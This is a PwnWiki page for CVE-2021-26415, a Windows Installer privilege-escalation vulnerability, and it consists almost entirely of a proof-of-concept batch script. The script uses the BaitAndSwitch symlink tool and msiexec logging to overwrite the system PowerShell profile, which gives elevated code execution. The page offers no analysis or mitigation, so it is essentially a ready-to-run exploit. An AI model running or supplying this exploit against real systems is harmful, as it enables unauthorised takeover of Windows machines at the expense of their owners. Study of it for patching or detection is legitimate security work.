CVE-2021-26415 Windows Installer 特權提升漏洞

From PwnWiki
Revision as of 11:02, 22 April 2021 by Pwnwiki (talk | contribs) (Created page with "==POC== <pre> @echo off REM Put BaitAndSwitch, example.msi into C:\temp echo > C:\temp\fakelog.txt start C:\temp\BaitAndSwitch C:\temp\linkdir\link C:\temp\fakelog.txt C:\Wind...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

POC

@echo off
REM Put BaitAndSwitch, example.msi into C:\temp
echo > C:\temp\fakelog.txt
start C:\temp\BaitAndSwitch C:\temp\linkdir\link C:\temp\fakelog.txt C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1
timeout /t 1
msiexec /j C:\temp\example.msi /t ksz /Li! C:\temp\linkdir\link /qn
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2021-26415_Windows_Installer_特權提升漏洞&oldid=1860"